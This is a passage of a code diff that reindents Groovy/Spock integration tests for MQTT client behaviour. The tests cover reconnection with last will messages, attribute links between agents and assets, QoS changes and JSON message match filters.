-            assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id)[0] !== existingConnection
-        }
-
-
-        then: "all subscriptions including the bathroom should be in place"
-        conditions.eventually {
-            assert client.topicConsumerMap.size() == 5
-            assert client.topicConsumerMap.keySet().stream().allMatch {subscriptions.contains(it)}
-            assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id).size() == 1
-            def connection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id)[0]
-            assert defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
-            assert defaultMQTTHandler.sessionSubscriptionConsumers.get(getConnectionIDString(connection)).size() == 5
-        }
-
-        when: "subscribed attributes are updated"
-        counter = 0
-        received.clear()
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment1BathroomId, Asset.NOTES, Integer.toString(counter++)))
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment1HallwayId, Asset.NOTES, Integer.toString(counter++)))
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment1Bedroom1Id, Asset.NOTES, Integer.toString(counter++)))
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment1KitchenId, Asset.NOTES, Integer.toString(counter++)))
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment1LivingroomId, Asset.NOTES, Integer.toString(counter++)))
-
-        then: "5 messages should have been received"
-        conditions.eventually {
-            assert received.size() == 5
-            assert received.any {it.topic == subscriptions[0] && ValueUtil.parse(it.payload, AttributeEvent.class).get().value.orElse(null) == "0"}
-            assert received.any {it.topic == subscriptions[1] && ValueUtil.parse(it.payload, AttributeEvent.class).get().value.orElse(null) == "1"}
-            assert received.any {it.topic == subscriptions[2] && ValueUtil.parse(it.payload, AttributeEvent.class).get().value.orElse(null) == "2"}
-            assert received.any {it.topic == subscriptions[3] && ValueUtil.parse(it.payload, AttributeEvent.class).get().value.orElse(null) == "3"}
-            assert received.any {it.topic == subscriptions[4] && ValueUtil.parse(it.payload, AttributeEvent.class).get().value.orElse(null) == "4"}
-        }
-
-        cleanup: "remove the client"
-        if (client != null) {
-            client.disconnect()
-        }
+    then: "the client should have disconnected and reconnected"
+    conditions.eventually {
+      assert client.getConnectionStatus() == ConnectionStatus.CONNECTED
+      assert !mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id).isEmpty()
+      assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id)[0] != existingConnection
     }
 
-    @SuppressWarnings("GroovyAccessibility")
-    def "Check MQTT client protocol and linked attribute deployment"() {
+    then: "all subscriptions including the bathroom should be in place"
+    conditions.eventually {
+      assert client.topicConsumerMap.size() == 5
+      assert client.topicConsumerMap.keySet().stream().allMatch {subscriptions.contains(it)}
+      assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id).size() == 1
+      def connection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id)[0]
+      assert defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
+      assert defaultMQTTHandler.sessionSubscriptionConsumers.get(getConnectionIDString(connection)).size() == 5
+    }
 
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    when: "subscribed attributes are updated"
+    counter = 0
+    received.clear()
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment1BathroomId, Asset.NOTES, Integer.toString(counter++)))
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment1HallwayId, Asset.NOTES, Integer.toString(counter++)))
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment1Bedroom1Id, Asset.NOTES, Integer.toString(counter++)))
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment1KitchenId, Asset.NOTES, Integer.toString(counter++)))
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment1LivingroomId, Asset.NOTES, Integer.toString(counter++)))
 
-        and: "the container starts"
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def agentService = container.getService(AgentService.class)
-        def brokerService = container.getService(MQTTBrokerService.class)
-        def defaultMQTTHandler = brokerService.getCustomHandlers().find{it instanceof DefaultMQTTHandler} as DefaultMQTTHandler
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def mqttHost = brokerService.host
-        def mqttPort = brokerService.port
+    then: "5 messages should have been received"
+    conditions.eventually {
+      assert received.size() == 5
+      assert received.any {
+        it.topic == subscriptions[0] && ValueUtil.parse(it.payload, AttributeEvent.class).get().value.orElse(null) == "0"
+      }
+      assert received.any {
+        it.topic == subscriptions[1] && ValueUtil.parse(it.payload, AttributeEvent.class).get().value.orElse(null) == "1"
+      }
+      assert received.any {
+        it.topic == subscriptions[2] && ValueUtil.parse(it.payload, AttributeEvent.class).get().value.orElse(null) == "2"
+      }
+      assert received.any {
+        it.topic == subscriptions[3] && ValueUtil.parse(it.payload, AttributeEvent.class).get().value.orElse(null) == "3"
+      }
+      assert received.any {
+        it.topic == subscriptions[4] && ValueUtil.parse(it.payload, AttributeEvent.class).get().value.orElse(null) == "4"
+      }
+    }
 
-        when: "an MQTT client agent is created to connect to this tests manager"
-        def clientId = UniqueIdentifierGenerator.generateId()
-        def agent = new MQTTAgent("Test agent")
+    when: "the client is disconnected due to a connection error"
+    existingConnection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id)[0]
+    received.clear()
+    MqttDisconnectUtil.close(((MqttClientConnectionConfig)((MqttClientConfig)((Mqtt3ClientConfigView)((Mqtt3AsyncClientView)client.client).clientConfig).delegate).connectionConfig.get()).channel, "Connection Error")
+
+    then: "the last will message should have been sent"
+    conditions.eventually {
+      def hallway = assetStorageService.find(managerTestSetup.apartment1HallwayId)
+      assert hallway.getAttribute(Asset.NOTES).flatMap{it.value}.orElse("") == "LAST WILL"
+    }
+
+    then: "the client should reconnect"
+    conditions.eventually {
+      assert client.getConnectionStatus() == ConnectionStatus.CONNECTED
+      assert !mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id).isEmpty()
+      assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id)[0] !== existingConnection
+    }
+
+
+    then: "all subscriptions including the bathroom should be in place"
+    conditions.eventually {
+      assert client.topicConsumerMap.size() == 5
+      assert client.topicConsumerMap.keySet().stream().allMatch {subscriptions.contains(it)}
+      assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id).size() == 1
+      def connection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id)[0]
+      assert defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
+      assert defaultMQTTHandler.sessionSubscriptionConsumers.get(getConnectionIDString(connection)).size() == 5
+    }
+
+    when: "subscribed attributes are updated"
+    counter = 0
+    received.clear()
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment1BathroomId, Asset.NOTES, Integer.toString(counter++)))
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment1HallwayId, Asset.NOTES, Integer.toString(counter++)))
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment1Bedroom1Id, Asset.NOTES, Integer.toString(counter++)))
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment1KitchenId, Asset.NOTES, Integer.toString(counter++)))
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment1LivingroomId, Asset.NOTES, Integer.toString(counter++)))
+
+    then: "5 messages should have been received"
+    conditions.eventually {
+      assert received.size() == 5
+      assert received.any {
+        it.topic == subscriptions[0] && ValueUtil.parse(it.payload, AttributeEvent.class).get().value.orElse(null) == "0"
+      }
+      assert received.any {
+        it.topic == subscriptions[1] && ValueUtil.parse(it.payload, AttributeEvent.class).get().value.orElse(null) == "1"
+      }
+      assert received.any {
+        it.topic == subscriptions[2] && ValueUtil.parse(it.payload, AttributeEvent.class).get().value.orElse(null) == "2"
+      }
+      assert received.any {
+        it.topic == subscriptions[3] && ValueUtil.parse(it.payload, AttributeEvent.class).get().value.orElse(null) == "3"
+      }
+      assert received.any {
+        it.topic == subscriptions[4] && ValueUtil.parse(it.payload, AttributeEvent.class).get().value.orElse(null) == "4"
+      }
+    }
+
+    cleanup: "remove the client"
+    if (client != null) {
+      client.disconnect()
+    }
+  }
+
+  @SuppressWarnings("GroovyAccessibility")
+  def "Check MQTT client protocol and linked attribute deployment"() {
+
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+
+    and: "the container starts"
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def agentService = container.getService(AgentService.class)
+    def brokerService = container.getService(MQTTBrokerService.class)
+    def defaultMQTTHandler = brokerService.getCustomHandlers().find{
+      it instanceof DefaultMQTTHandler
+    } as DefaultMQTTHandler
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def mqttHost = brokerService.host
+    def mqttPort = brokerService.port
+
+    when: "an MQTT client agent is created to connect to this tests manager"
+    def clientId = UniqueIdentifierGenerator.generateId()
+    def agent = new MQTTAgent("Test agent")
             .setRealm(Constants.MASTER_REALM)
             .setClientId(clientId)
             .setHost(mqttHost)
             .setPort(mqttPort)
             .setUsernamePassword(new UsernamePassword(keycloakTestSetup.realmBuilding.name + ":" + keycloakTestSetup.serviceUser.username, keycloakTestSetup.serviceUser.secret))
 
-        and: "the agent is added to the asset service"
-        agent = assetStorageService.merge(agent)
+    and: "the agent is added to the asset service"
+    agent = assetStorageService.merge(agent)
 
-        then: "the protocol should authenticate and the agent status should become CONNECTED"
-        conditions.eventually {
-            agent = assetStorageService.find(agent.id, Agent.class)
-            assert agent.getAgentStatus().orElse(null) == ConnectionStatus.CONNECTED
-        }
-
-        when: "an asset is created with attributes linked to the agent"
-        def asset = new ThingAsset("Test Asset")
-            .setParent(agent)
-            .addOrReplaceAttributes(
-                // write attribute value
-                new Attribute<>("readWriteTargetTemp", NUMBER)
-                    .addMeta(
-                        new MetaItem<>(AGENT_LINK, new MQTTAgentLink(agent.id)
-                            .setSubscriptionTopic("${keycloakTestSetup.realmBuilding.name}/$clientId/${DefaultMQTTHandler.ATTRIBUTE_VALUE_TOPIC}/targetTemperature/${managerTestSetup.apartment1LivingroomId}")
-                            .setPublishTopic("${keycloakTestSetup.realmBuilding.name}/$clientId/${DefaultMQTTHandler.ATTRIBUTE_VALUE_WRITE_TOPIC}/targetTemperature/${managerTestSetup.apartment1LivingroomId}")
-                            .setWriteValue("%VALUE%")
-                    ))
-        )
-
-        and: "the asset is merged into the asset service"
-        asset = assetStorageService.merge(asset)
-
-        then: "the linked attributes should be correctly linked"
-        conditions.eventually {
-            assert !(agentService.getProtocolInstance(agent.id) as MQTTProtocol).protocolMessageConsumers.isEmpty()
-            assert ((agentService.getProtocolInstance(agent.id) as MQTTProtocol).client as MQTT_IOClient).topicConsumerMap.size() == 1
-            assert ((agentService.getProtocolInstance(agent.id) as MQTTProtocol).client as MQTT_IOClient).topicConsumerMap.get("${keycloakTestSetup.realmBuilding.name}/$clientId/${DefaultMQTTHandler.ATTRIBUTE_VALUE_TOPIC}/targetTemperature/${managerTestSetup.apartment1LivingroomId}".toString()) != null
-            def connection = brokerService.getConnectionFromClientID(clientId)
-            assert connection != null
-            assert defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
-        }
-
-        when: "the attribute referenced in the agent link is updated"
-        ((SimulatorProtocol)agentService.getProtocolInstance(managerTestSetup.apartment1ServiceAgentId)).updateSensor(new AttributeEvent(managerTestSetup.apartment1LivingroomId, "targetTemperature", 99d))
-
-        then: "the values should be stored in the database"
-        conditions.eventually {
-            def livingRoom = assetStorageService.find(managerTestSetup.apartment1LivingroomId)
-            assert livingRoom != null
-            assert livingRoom.getAttribute("targetTemperature").flatMap{it.value}.orElse(0d) == 99d
-        }
-
-        then: "the agent linked attribute should also have the updated value of the subscribed attribute"
-        conditions.eventually {
-            asset = assetStorageService.find(asset.getId(), true)
-            assert asset.getAttribute("readWriteTargetTemp").get().getValue().orElse(null) == 99d
-        }
-
-        when: "the agent linked attribute is updated"
-        def attributeEvent = new AttributeEvent(asset.id,
-            "readWriteTargetTemp",
-            19.5)
-        assetProcessingService.sendAttributeEvent(attributeEvent)
-
-        then: "the linked targetTemperature attribute should contain this written value (it should have been written to the target temp attribute and then read back again)"
-        conditions.eventually {
-            asset = assetStorageService.find(asset.getId(), true)
-            assert asset.getAttribute("readWriteTargetTemp").flatMap{it.getValue()}.orElse(null) == 19.5d
-        }
-
-        when: "the agent link is updated to use a different qos for the subscription"
-        asset.getAttribute("readWriteTargetTemp").get().addOrReplaceMeta(
-                                        new MetaItem<>(AGENT_LINK, new MQTTAgentLink(agent.id)
-                                                .setSubscriptionTopic("${keycloakTestSetup.realmBuilding.name}/$clientId/${DefaultMQTTHandler.ATTRIBUTE_VALUE_TOPIC}/targetTemperature/${managerTestSetup.apartment1LivingroomId}")
-                                                .setPublishTopic("${keycloakTestSetup.realmBuilding.name}/$clientId/${DefaultMQTTHandler.ATTRIBUTE_VALUE_WRITE_TOPIC}/targetTemperature/${managerTestSetup.apartment1LivingroomId}")
-                                                .setQos(2)
-                                                .setWriteValue("%VALUE%")
-                                        ))
-
-        and: "the asset is merged into the asset service"
-        asset = assetStorageService.merge(asset)
-
-        then: "the linked attributes should be correctly linked"
-        conditions.eventually {
-            assert !(agentService.getProtocolInstance(agent.id) as MQTTProtocol).protocolMessageConsumers.isEmpty()
-            assert ((agentService.getProtocolInstance(agent.id) as MQTTProtocol).client as MQTT_IOClient).topicConsumerMap.size() == 1
-            assert ((agentService.getProtocolInstance(agent.id) as MQTTProtocol).client as MQTT_IOClient).topicConsumerMap.get("${keycloakTestSetup.realmBuilding.name}/$clientId/${DefaultMQTTHandler.ATTRIBUTE_VALUE_TOPIC}/targetTemperature/${managerTestSetup.apartment1LivingroomId}".toString()) != null
-            def connection = brokerService.getConnectionFromClientID(clientId)
-            assert connection != null
-            assert defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
-        }
-
-        cleanup: "the agent and assets are deleted"
-        if (asset != null) {
-            assetStorageService.delete([asset.id])
-        }
-        if (agent != null) {
-            assetStorageService.delete([agent.id])
-        }
-        conditions.eventually {
-            assert brokerService.getUserConnections(keycloakTestSetup.serviceUser.id).isEmpty()
-        }
+    then: "the protocol should authenticate and the agent status should become CONNECTED"
+    conditions.eventually {
+      agent = assetStorageService.find(agent.id, Agent.class)
+      assert agent.getAgentStatus().orElse(null) == ConnectionStatus.CONNECTED
     }
 
-    def "Check MQTT client protocol message match filter support"() {
-
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-
-        when: "the container starts"
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def brokerService = container.getService(MQTTBrokerService.class)
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def mqttHost = brokerService.host
-        def mqttPort = brokerService.port
-        def mqttAgentClientId = UniqueIdentifierGenerator.generateId()
-
-        and: "a test asset is created"
-        def testThing = new ThingAsset("Test thing")
-            .setRealm(keycloakTestSetup.realmBuilding.name)
+    when: "an asset is created with attributes linked to the agent"
+    def asset = new ThingAsset("Test Asset")
+            .setParent(agent)
             .addOrReplaceAttributes(
-                new Attribute<Object>("test", JSON)
+            // write attribute value
+            new Attribute<>("readWriteTargetTemp", NUMBER)
+            .addMeta(
+                    new MetaItem<>(AGENT_LINK, new MQTTAgentLink(agent.id)
+                    .setSubscriptionTopic("${keycloakTestSetup.realmBuilding.name}/$clientId/${DefaultMQTTHandler.ATTRIBUTE_VALUE_TOPIC}/targetTemperature/${managerTestSetup.apartment1LivingroomId}")
+                    .setPublishTopic("${keycloakTestSetup.realmBuilding.name}/$clientId/${DefaultMQTTHandler.ATTRIBUTE_VALUE_WRITE_TOPIC}/targetTemperature/${managerTestSetup.apartment1LivingroomId}")
+                    .setWriteValue("%VALUE%")
+                    ))
             )
 
-        and: "the test asset is added to the asset service"
-        testThing = assetStorageService.merge(testThing)
+    and: "the asset is merged into the asset service"
+    asset = assetStorageService.merge(asset)
 
-        and: "a MQTT agent is created"
-        def agent = new MQTTAgent("Test agent")
+    then: "the linked attributes should be correctly linked"
+    conditions.eventually {
+      assert !(agentService.getProtocolInstance(agent.id) as MQTTProtocol).protocolMessageConsumers.isEmpty()
+      assert ((agentService.getProtocolInstance(agent.id) as MQTTProtocol).client as MQTT_IOClient).topicConsumerMap.size() == 1
+      assert ((agentService.getProtocolInstance(agent.id) as MQTTProtocol).client as MQTT_IOClient).topicConsumerMap.get("${keycloakTestSetup.realmBuilding.name}/$clientId/${DefaultMQTTHandler.ATTRIBUTE_VALUE_TOPIC}/targetTemperature/${managerTestSetup.apartment1LivingroomId}".toString()) != null
+      def connection = brokerService.getConnectionFromClientID(clientId)
+      assert connection != null
+      assert defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
+    }
+
+    when: "the attribute referenced in the agent link is updated"
+    ((SimulatorProtocol)agentService.getProtocolInstance(managerTestSetup.apartment1ServiceAgentId)).updateSensor(new AttributeEvent(managerTestSetup.apartment1LivingroomId, "targetTemperature", 99d))
+
+    then: "the values should be stored in the database"
+    conditions.eventually {
+      def livingRoom = assetStorageService.find(managerTestSetup.apartment1LivingroomId)
+      assert livingRoom != null
+      assert livingRoom.getAttribute("targetTemperature").flatMap{it.value}.orElse(0d) == 99d
+    }
+
+    then: "the agent linked attribute should also have the updated value of the subscribed attribute"
+    conditions.eventually {
+      asset = assetStorageService.find(asset.getId(), true)
+      assert asset.getAttribute("readWriteTargetTemp").get().getValue().orElse(null) == 99d
+    }
+
+    when: "the agent linked attribute is updated"
+    def attributeEvent = new AttributeEvent(asset.id,
+            "readWriteTargetTemp",
+            19.5)
+    assetProcessingService.sendAttributeEvent(attributeEvent)
+
+    then: "the linked targetTemperature attribute should contain this written value (it should have been written to the target temp attribute and then read back again)"
+    conditions.eventually {
+      asset = assetStorageService.find(asset.getId(), true)
+      assert asset.getAttribute("readWriteTargetTemp").flatMap{
+        it.getValue()
+      }.orElse(null) == 19.5d
+    }
+
+    when: "the agent link is updated to use a different qos for the subscription"
+    asset.getAttribute("readWriteTargetTemp").get().addOrReplaceMeta(
+            new MetaItem<>(AGENT_LINK, new MQTTAgentLink(agent.id)
+            .setSubscriptionTopic("${keycloakTestSetup.realmBuilding.name}/$clientId/${DefaultMQTTHandler.ATTRIBUTE_VALUE_TOPIC}/targetTemperature/${managerTestSetup.apartment1LivingroomId}")
+            .setPublishTopic("${keycloakTestSetup.realmBuilding.name}/$clientId/${DefaultMQTTHandler.ATTRIBUTE_VALUE_WRITE_TOPIC}/targetTemperature/${managerTestSetup.apartment1LivingroomId}")
+            .setQos(2)
+            .setWriteValue("%VALUE%")
+            ))
+
+    and: "the asset is merged into the asset service"
+    asset = assetStorageService.merge(asset)
+
+    then: "the linked attributes should be correctly linked"
+    conditions.eventually {
+      assert !(agentService.getProtocolInstance(agent.id) as MQTTProtocol).protocolMessageConsumers.isEmpty()
+      assert ((agentService.getProtocolInstance(agent.id) as MQTTProtocol).client as MQTT_IOClient).topicConsumerMap.size() == 1
+      assert ((agentService.getProtocolInstance(agent.id) as MQTTProtocol).client as MQTT_IOClient).topicConsumerMap.get("${keycloakTestSetup.realmBuilding.name}/$clientId/${DefaultMQTTHandler.ATTRIBUTE_VALUE_TOPIC}/targetTemperature/${managerTestSetup.apartment1LivingroomId}".toString()) != null
+      def connection = brokerService.getConnectionFromClientID(clientId)
+      assert connection != null
+      assert defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
+    }
+
+    cleanup: "the agent and assets are deleted"
+    if (asset != null) {
+      assetStorageService.delete([asset.id])
+    }
+    if (agent != null) {
+      assetStorageService.delete([agent.id])
+    }
+    conditions.eventually {
+      assert brokerService.getUserConnections(keycloakTestSetup.serviceUser.id).isEmpty()
+    }
+  }
+
+  def "Check MQTT client protocol message match filter support"() {
+
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+
+    when: "the container starts"
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def brokerService = container.getService(MQTTBrokerService.class)
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def mqttHost = brokerService.host
+    def mqttPort = brokerService.port
+    def mqttAgentClientId = UniqueIdentifierGenerator.generateId()
+
+    and: "a test asset is created"
+    def testThing = new ThingAsset("Test thing")
+            .setRealm(keycloakTestSetup.realmBuilding.name)
+            .addOrReplaceAttributes(
+            new Attribute<Object>("test", JSON)
+            )
+
+    and: "the test asset is added to the asset service"
+    testThing = assetStorageService.merge(testThing)
+
+    and: "a MQTT agent is created"
+    def agent = new MQTTAgent("Test agent")
             .setRealm(MASTER_REALM)
             .setClientId(mqttAgentClientId)
             .setHost(mqttHost)
             .setPort(mqttPort)
             .setUsernamePassword(new UsernamePassword(keycloakTestSetup.realmBuilding.name + ":" + keycloakTestSetup.serviceUser.username, keycloakTestSetup.serviceUser.secret))
 
-        and: "the agent is added to the asset service"
-        agent = assetStorageService.merge(agent)
+    and: "the agent is added to the asset service"
+    agent = assetStorageService.merge(agent)
 
-        then: "the protocol should authenticate and the agent status should become CONNECTED"
-        conditions.eventually {
-            agent = assetStorageService.find(agent.id, Agent.class)
-            assert agent.getAgentStatus().orElse(null) == ConnectionStatus.CONNECTED
-        }
-
-        when: "an asset is created with attributes linked to the agent"
-        def subscriptionTopic = "${keycloakTestSetup.realmBuilding.name}/$mqttAgentClientId/${DefaultMQTTHandler.ATTRIBUTE_VALUE_TOPIC}/test/${testThing.id}"
-        def asset = new ThingAsset("Test Asset")
-            .setParent(agent)
-            .addOrReplaceAttributes(
-                new Attribute<>("temperature", NUMBER)
-                    .addMeta(
-                        new MetaItem<>(AGENT_LINK, new MQTTAgentLink(agent.id)
-                            .setSubscriptionTopic(subscriptionTopic)
-                            .setValueFilters([new JsonPathFilter('$.temperature', true, false)] as ValueFilter[])
-                            .setMessageMatchFilters([new JsonPathFilter('$.port', true, false)] as ValueFilter[])
-                            .setMessageMatchPredicate(new NumberPredicate(85))
-                        )),
-                new Attribute<>("switchStatus", BOOLEAN)
-                    .addMeta(
-                        new MetaItem<>(AGENT_LINK, new MQTTAgentLink(agent.id)
-                            .setSubscriptionTopic(subscriptionTopic)
-                            .setValueFilters([new JsonPathFilter('$.switch_status', true, false)] as ValueFilter[])
-                            .setMessageMatchFilters([new JsonPathFilter('$.port', true, false)] as ValueFilter[])
-                            .setMessageMatchPredicate(new NumberPredicate(85))
-                            .setValueConverter([
-                                SWITCH_ON : true,
-                                SWITCH_OFF: false
-                            ])
-                        ))
-            )
-
-        and: "the asset is merged into the asset service"
-        asset = assetStorageService.merge(asset)
-
-        and: "a message which should pass the message match filter is published"
-        def json = [
-            port: 85,
-            temperature: 19.5,
-            switch_status: "switch_on"
-        ]
-        def attributeEvent = new AttributeEvent(testThing.id, "test", json)
-        Thread.sleep(200)
-        assetProcessingService.sendAttributeEvent(attributeEvent)
-
-        then: "asset attribute values should be updated"
-        conditions.eventually {
-            asset = assetStorageService.find(asset.id, true)
-            assert asset.getAttribute("temperature").flatMap { it.value }.map { it == 19.5 }.orElse(false)
-            assert asset.getAttribute("switchStatus").flatMap { it.value }.map { it == true }.orElse(false)
-        }
-
-        when: "a message which should not pass the message match filter is published"
-        json = [
-            port: 1,
-            temperature: 20.5,
-            switch_status: "switch_off"
-        ]
-        attributeEvent = new AttributeEvent(testThing.id, "test", json)
-        assetProcessingService.sendAttributeEvent(attributeEvent)
-
-        then: "asset attribute values should not be updated"
-        def start = System.currentTimeMillis()
-        while (System.currentTimeMillis() - start < 2000) {
-            asset = assetStorageService.find(asset.id, true)
-            assert asset.getAttribute("temperature").flatMap { it.value }.map { it == 19.5 }.orElse(false)
-            assert asset.getAttribute("switchStatus").flatMap { it.value }.map { it == true }.orElse(false)
-            Thread.sleep((100))
-        }
-
-        when: "a message which should pass the message match filter is published"
-        json = [
-            port: 85,
-            temperature: 21.5,
-            switch_status: "switch_off"
-        ]
-        attributeEvent = new AttributeEvent(testThing.id, "test", json)
-        assetProcessingService.sendAttributeEvent(attributeEvent)
-
-        then: "asset attribute values should be updated"
-        conditions.eventually {
-            asset = assetStorageService.find(asset.id, true)
-            assert asset.getAttribute("temperature").flatMap { it.value }.map { it == 21.5 }.orElse(false)
-            assert asset.getAttribute("switchStatus").flatMap { it.value }.map { it == false }.orElse(false)
-        }
-
-
-        cleanup: "the agent and assets are deleted"
-        if (asset != null) {
-            assetStorageService.delete([asset.id])
-        }
-        if (testThing != null) {
-            assetStorageService.delete([testThing.id])
-        }
-        if (agent != null) {
-            assetStorageService.delete([agent.id])
-        }
-        conditions.eventually {
-            assert brokerService.getUserConnections(keycloakTestSetup.serviceUser.id).isEmpty()
-        }
+    then: "the protocol should authenticate and the agent status should become CONNECTED"
+    conditions.eventually {
+      agent = assetStorageService.find(agent.id, Agent.class)
+      assert agent.getAgentStatus().orElse(null) == ConnectionStatus.CONNECTED
     }
 
-    def "Check MQTT client protocol wildcard subscriptions"() {
+    when: "an asset is created with attributes linked to the agent"
+    def subscriptionTopic = "${keycloakTestSetup.realmBuilding.name}/$mqttAgentClientId/${DefaultMQTTHandler.ATTRIBUTE_VALUE_TOPIC}/test/${testThing.id}"
+    def asset = new ThingAsset("Test Asset")
+            .setParent(agent)
+            .addOrReplaceAttributes(
+            new Attribute<>("temperature", NUMBER)
+            .addMeta(
+                    new MetaItem<>(AGENT_LINK, new MQTTAgentLink(agent.id)
+                    .setSubscriptionTopic(subscriptionTopic)
+                    .setValueFilters([new JsonPathFilter('$.temperature', true, false)] as ValueFilter[])
+                    .setMessageMatchFilters([new JsonPathFilter('$.port', true, false)] as ValueFilter[])
+                    .setMessageMatchPredicate(new NumberPredicate(85))
+                    )),
+            new Attribute<>("switchStatus", BOOLEAN)
+            .addMeta(
+                    new MetaItem<>(AGENT_LINK, new MQTTAgentLink(agent.id)
+                    .setSubscriptionTopic(subscriptionTopic)
+                    .setValueFilters([new JsonPathFilter('$.switch_status', true, false)] as ValueFilter[])
+                    .setMessageMatchFilters([new JsonPathFilter('$.port', true, false)] as ValueFilter[])
+                    .setMessageMatchPredicate(new NumberPredicate(85))
+                    .setValueConverter([
+                      SWITCH_ON : true,
+                      SWITCH_OFF: false
+                    ])
+                    ))
+            )
 
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 20, delay: 0.2)
+    and: "the asset is merged into the asset service"
+    asset = assetStorageService.merge(asset)
 
-        when: "the container starts"
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def agentService = container.getService(AgentService.class)
-        def mqttBrokerService = container.getService(MQTTBrokerService.class)
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def mqttHost = mqttBrokerService.host
-        def mqttPort = mqttBrokerService.port
-        def mqttAgentClientId = UniqueIdentifierGenerator.generateId()
-        def defaultMQTTHandler = mqttBrokerService.getCustomHandlers().find {it instanceof DefaultMQTTHandler} as DefaultMQTTHandler
+    and: "a message which should pass the message match filter is published"
+    def json = [
+      port: 85,
+      temperature: 19.5,
+      switch_status: "switch_on"
+    ]
+    def attributeEvent = new AttributeEvent(testThing.id, "test", json)
+    Thread.sleep(200)
+    assetProcessingService.sendAttributeEvent(attributeEvent)
 
-        and: "test assets are created"
-        def testThing1 = new ThingAsset("Test thing 1")
+    then: "asset attribute values should be updated"
+    conditions.eventually {
+      asset = assetStorageService.find(asset.id, true)
+      assert asset.getAttribute("temperature").flatMap {
+        it.value
+      }.map {
+        it == 19.5
+      }.orElse(false)
+      assert asset.getAttribute("switchStatus").flatMap {
+        it.value
+      }.map {
+        it == true
+      }.orElse(false)
+    }
+
+    when: "a message which should not pass the message match filter is published"
+    json = [
+      port: 1,
+      temperature: 20.5,
+      switch_status: "switch_off"
+    ]
+    attributeEvent = new AttributeEvent(testThing.id, "test", json)
+    assetProcessingService.sendAttributeEvent(attributeEvent)
+
+    then: "asset attribute values should not be updated"
+    def start = System.currentTimeMillis()
+    while (System.currentTimeMillis() - start < 2000) {
+      asset = assetStorageService.find(asset.id, true)
+      assert asset.getAttribute("temperature").flatMap {
+        it.value
+      }.map {
+        it == 19.5
+      }.orElse(false)
+      assert asset.getAttribute("switchStatus").flatMap {
+        it.value
+      }.map {
+        it == true
+      }.orElse(false)
+      Thread.sleep((100))
+    }
+
+    when: "a message which should pass the message match filter is published"
+    json = [
+      port: 85,
+      temperature: 21.5,
+      switch_status: "switch_off"
+    ]
+    attributeEvent = new AttributeEvent(testThing.id, "test", json)
+    assetProcessingService.sendAttributeEvent(attributeEvent)
+
+    then: "asset attribute values should be updated"
+    conditions.eventually {
+      asset = assetStorageService.find(asset.id, true)
+      assert asset.getAttribute("temperature").flatMap {
+        it.value
+      }.map {
+        it == 21.5
+      }.orElse(false)
